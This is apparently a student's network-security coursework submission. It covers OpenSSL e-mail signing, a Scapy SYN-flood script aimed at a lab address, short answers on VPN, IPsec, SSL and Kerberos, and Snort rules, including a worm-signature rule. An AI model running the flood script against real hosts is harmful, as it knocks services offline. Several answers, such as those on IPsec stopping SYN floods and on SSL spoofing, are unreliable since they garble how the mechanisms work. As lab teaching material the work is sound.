Coursework Submission
Exercise 1: E-Mail Signing
1.1 A complete list of OpenSSL commands
a). generate RSA private key
openssl genrsa -out mail.key 2048
– genrsa : use RSA algorithm.
– -out mail.key 2048 : the private key name is mail.key and its length is 2048 bits.
b). generate signing certificate csr file
openssl req -new -key mail.key -out mail.csr -config ../ca/openssl.cnf
– -key mail.key : private key
– -out mail.csr : output csr file name
– -config ../ca/openssl.cnf : the configuration file that openssl uses
c). generate signing certificate
openssl ca -in mail.csr -out mail.crt -cert ../ca/ca.crt -keyfile ../ca/ca.key -config ../ca/openssl.cnf -extensions v3_req
– -in mail.csr : signing certificate csr file
– -out mail.crt : output signing certificate file name
– -cert ../ca/ca.crt : Certification Authority certificate
– -keyfile ../ca/ca.key : Certification Authority private key
– -config ../ca/openssl.cnf : the configuration file that openssl uses
– -extensions v3_req : extension information of the signing certificate
d). check the mail signing certificate content
openssl x509 -in mail.crt -noout -text
– -in mail.crt : the signing certificate that needs to be checked
– -noout -text : the output format
1.2 The certificate description
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 4096 (0x1000)
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=GB, ST=Surrey, O=COMM048 Ltd, CN=COMM048_STUDENT
        Validity
            Not Before: Jan 7 15:07:34 2019 GMT
            Not After : Jan 7 15:07:34 2020 GMT
        Subject: C=GB, ST=Surrey, O=COMM048 Ltd, CN=COMM048_STUDENT
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints: CA:FALSE
            X509v3 Key Usage:
                Digital Signature, Non Repudiation, Key Encipherment
            X509v3 Subject Alternative Name: email:gyf13723086336@gmail.com
    Signature Algorithm: sha256WithRSAEncryption
1.3 Steps taken to import the private key and certificate into your email
a). combine the private key and signing certificate into a PKCS#12 certificate.
openssl pkcs12 -export -in mail.crt -inkey mail.key -nodes -out mail.p12
b). import the CA certificate into the Thunderbird server.
c). import the mail.p12 certificate into the Thunderbird server.
1.4 Screen Capture
Figure 1.1 certificate import
Exercise 2: SYN Flooding Attack
2.1 A SYN packet in Scapy
a). scapy send SYN packet command
sr1(IP(dst="192.168.221.152")/TCP(dport=80,flags="S"))
b). wireshark capture result of the victim machine
Figure 2.1 SYN packet capture
Figure 2.2 SYN packet detail
2.2 A python script
The Python script that generates the SYN flooding attack is as follows (syn_flood_attack.py):
#!/usr/bin/python
#coding=utf-8
from scapy.all import *

def synFlood():
    for sport in range(49512, 65535):
        IPlayer = IP(src="192.168.*.*", dst="192.168.221.152")
        TCPlayer = TCP(sport=sport, dport=80)
        pkt = IPlayer / TCPlayer
        send(pkt)

if __name__ == '__main__':
    synFlood()
On the attack virtual machine, run this Python script. On the victim virtual machine, open Wireshark to see the result:
Figure 2.3 victim machine under syn flooding attack
When we need to cancel the attack, input the command "Ctrl + Z".
Exercise 3: VPN, IPSec, SSL and Kerberos
3.1 Virtual Private Network (VPN)
Compared to dedicated networks utilizing frame relay, leased lines, and traditional dial-up, benefits of VPNs are as follows:
a). VPN can enhance security.
b). VPN has a safe IP address. The VPN is encrypted, so users on the internet can only get the public IP address and can't get the internal private IP address.
c). VPN is easy to extend.
d). VPN supports most common protocols.
e). VPN is cheaper than other methods.
3.2 TCP security, IPSec
a). How IPSec prevents SYN flooding attacks
To prevent DoS, the IPsec protocol uses a sliding window in which each packet is assigned an ordinal number, and it only accepts new or existing packets that are not in the window. Old packets will be discarded immediately.
b). Consider the scenario
Yes, B's IPsec implementation will notice that the packet is a duplicate and discard it immediately.
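The receiver-side sliding-window check described in 3.2, as an added Python example that is not part of the original submission; it follows the anti-replay scheme of RFC 4303 (ESP). The window size of 8 and the arrival order are constructed for the demonstration.

```python
# Added example: IPsec-style anti-replay window (after RFC 4303).
# In a real implementation this check is only committed after the
# packet's integrity check has passed; that step is assumed here.

class AntiReplayWindow:
    def __init__(self, size=64):      # RFC 4303 suggests 64 as the default
        self.size = size
        self.top = 0      # highest sequence number accepted so far
        self.bitmap = 0   # bit i set => sequence number (top - i) was seen

    def check_and_update(self, seq):
        """Return 'accept', 'duplicate' or 'too_old' for one packet."""
        if seq <= 0:
            return "too_old"          # sequence numbers start at 1
        if seq > self.top:            # new packet: slide the window forward
            shift = seq - self.top
            mask = (1 << self.size) - 1
            self.bitmap = ((self.bitmap << shift) | 1) & mask
            self.top = seq
            return "accept"
        offset = self.top - seq
        if offset >= self.size:
            return "too_old"          # left of the window: discard
        if self.bitmap & (1 << offset):
            return "duplicate"        # already received: replay, discard
        self.bitmap |= 1 << offset    # late but unseen packet inside window
        return "accept"

def replay_demo():
    """Constructed arrivals: in-order, reordered, replayed and stale packets."""
    window = AntiReplayWindow(size=8)
    arrivals = [1, 2, 4, 3, 4, 20, 15, 12, 15, 2]
    return [(seq, window.check_and_update(seq)) for seq in arrivals]

if __name__ == "__main__":
    for seq, verdict in replay_demo():
        print(f"seq={seq:3d} -> {verdict}")
```
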
3.3 Digital Certificates
A digital certificate is a file digitally signed by a certificate authority that contains public key owner information and public key. The RSA cryptographic algorithm is usually used to create a digital certificate.
3.4 SSL
a). Man-in-the-middle attack
The server authenticates to the requesting client, and the client authenticates to the requesting server. Once the server verifies that the requesting client is untrustworthy, the server refuses to continue the communication. If the client finds that the server is untrustworthy, the communication is aborted.
b). Password sniffing
When using SSL, the user name and password will be first encrypted and then transmitted over the Internet over an SSL connection, and no one can read or access the data that you transmit over that connection.
c). IP spoofing
This relies on the digital certificate. After the connection between the user and the server is established, the server sends its digital certificate and public key to the user. The user generates the session key, encrypts it with the public key, and passes it to the server, and the server encrypts with the private key. In this way, a secure channel is established between client and server, and only SSL allows users to communicate with the server.
3.5 Kerberos
Figure 3.1 Kerberos
Exercise 4: Intrusion Detection Systems and Snort
4.1 Intrusion Detection Systems
a). Outline the components of an Intrusion Detection System (IDS)
An IDS consists of an Event Generator, an Event Analyzer, a Response System, and an Event Database.
b). Network-based and Host-based IDSs and their differences
Network-based IDSs: This kind of IDS connects to the Internet and captures packets on the Internet, analyzes whether they match a known attack pattern, and identifies whether the sender is an intruder.
Host-based IDSs: This kind of IDS analyzes system audit data to find suspicious activities, such as memory and file changes. The input data mainly comes from the audit log of the system, and generally it can only detect intrusions on the host.
Differences:
1. Network-based IDSs can objectively reflect the network activity, especially in the blind spots of host system auditing. Host-based IDSs allow for more precise monitoring of the various activities on the host.
2. Network-based IDSs are limited by the switched network and can only monitor the hosts at the same monitoring point, while host-based IDSs can monitor all the hosts at the same monitoring point.
4.2 Writing Snort Rules
a). Create a snort rule that alerts for FTP connection from any IP address different from Home_Net
alert tcp !$HOME_NET any -> any any (msg: "ftp connection"; metadata: service ftp;)
b). Create a snort rule that alerts for worm in content outgoing from Home_Net
alert tcp $HOME_NET any -> any any (msg: "worm"; content: "worm";)
c). Answer
Yes, it will raise an alert when a Google search for Internet Worm is executed from Home_Net. That is because an HTTP request packet has "worm" in its content field.
d). Create a snort rule that alerts for pings from External_Net
alert ip $EXTERNAL_NET any -> any any (ip_proto: icmp;)
4.3 Snort Rules
a). alert tcp any any -> 10.1.1.0/24 6000:6010 (msg: "X Windows Service traffic";)
For TCP connections whose destination IP address is in the subnet 10.1.1.0/24 and whose destination port is between 6000 and 6010, Snort will display the alert message "X Windows Service traffic".
b). alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"SCAN FIN"; flags: F; reference:arachnids,27;)
For TCP connections whose source IP address is $EXTERNAL_NET and destination IP address is $HOME_NET, whose TCP flags are "F" and whose reference is "arachnids,27", Snort will display the alert message "SCAN FIN".
c). alert tcp $HOME_NET 23 -> $EXTERNAL_NET any (msg:"TELNET login incorrect"; content:"Login incorrect"; flags: A+; reference:arachnids,127;)
For TCP connections whose source IP address is $HOME_NET, source port is 23, destination IP address is $EXTERNAL_NET, content is "Login incorrect", TCP flags are "A+" and reference is "arachnids,127", Snort will display the alert message "TELNET login incorrect".
d). alert icmp any any -> any any (msg:"ICMP Source Quench"; itype: 4; icode:0;)
For any ICMP traffic whose itype is 4 and icode is 0, Snort will display the alert message "ICMP Source Quench".
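To make the header fields read out in 4.3 concrete, here is an added Python example (not part of the original submission and not Snort's own code) that parses a rule and evaluates only its header against a packet. The variable values and packets are constructed, and the option parsing is simplified: it does not handle ";" inside quoted strings or repeated options.

```python
# Added example: parse a Snort rule and match its header ("->" rules only).
import ipaddress
import re

RULE_RE = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+"
    r"(?P<dir>->|<>)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)\s*$")

def parse_rule(text):
    """Split a rule into header fields plus a dict of its options."""
    m = RULE_RE.match(text.strip())
    if not m:
        raise ValueError("not a valid rule header")
    rule = m.groupdict()
    opts = {}
    for item in rule.pop("opts").split(";"):
        if item.strip():
            key, _, val = item.partition(":")
            opts[key.strip()] = val.strip().strip('"')
    rule["options"] = opts
    return rule

def addr_match(spec, ip, variables):
    negate = spec.startswith("!")
    name = spec.lstrip("!")
    net = variables.get(name, name)            # expand $HOME_NET and friends
    hit = net == "any" or ipaddress.ip_address(ip) in ipaddress.ip_network(net)
    return hit != negate

def port_match(spec, port):
    if spec == "any":
        return True
    lo, sep, hi = spec.partition(":")          # "23", "6000:6010", "6000:", ":1024"
    if not sep:
        return port == int(lo)
    return int(lo or 0) <= port <= int(hi or 65535)

def header_match(rule, pkt, variables):
    """pkt: dict with proto, src, sport, dst, dport (constructed test data)."""
    return (rule["proto"] == pkt["proto"]
            and addr_match(rule["src"], pkt["src"], variables)
            and port_match(rule["sport"], pkt["sport"])
            and addr_match(rule["dst"], pkt["dst"], variables)
            and port_match(rule["dport"], pkt["dport"]))

X11_RULE = 'alert tcp any any -> 10.1.1.0/24 6000:6010 (msg: "X Windows Service traffic";)'

if __name__ == "__main__":
    pkt = dict(proto="tcp", src="203.0.113.5", sport=40000, dst="10.1.1.7", dport=6005)
    print(header_match(parse_rule(X11_RULE), pkt, {}))
```
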
4.4 A Computer Worm
alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg: "Internet Worm to be stopped"; content: "07"; content: "71 f2 03 01 04 9b 71 f2 01"; content: "tire";)